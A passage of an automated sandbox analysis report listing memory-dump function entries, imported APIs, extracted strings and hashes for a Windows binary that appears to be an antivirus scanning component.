                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction ID: b2cc1f6ef1db7f268444f689d59df3978311126cbc3f024c687a3a524bab2b52
                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction Fuzzy Hash: 9A312A72709E8186EB609F61E8403B96361FB94B64F44407ADB4E47BA8EF78D658C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 1269745586-0
                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction ID: 14bcb4aadfa047e3919a13340682992a4958d7db2603e113df2948641334750f
                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction Fuzzy Hash: 57315336714F8186D760CB25E8402BE73A0FB94BA4F5441B6EB9D43B69EF38D155C710

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                      • API String ID: 1021822269-3147033232
                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                      • API String ID: 883923345-381368982
                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                      • String ID:
                                      • API String ID: 1613947383-0
                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 93015348-1041928032
                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressProc$Load$Library
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                      • API String ID: 3981747205-232180764
                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                      • API String ID: 3682727354-300733478
                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                      • API String ID: 2587151837-1427723692
                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                      • String ID: SetDllDirectoryW$kernel32.dll
                                      • API String ID: 3184163350-3826188083
                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3424473247-996641649
                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1775797328-0
                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 1232609184-0
                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                      • String ID: H
                                      • API String ID: 2107338056-2852464175
                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                      • API String ID: 1322048431-2685357988
                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
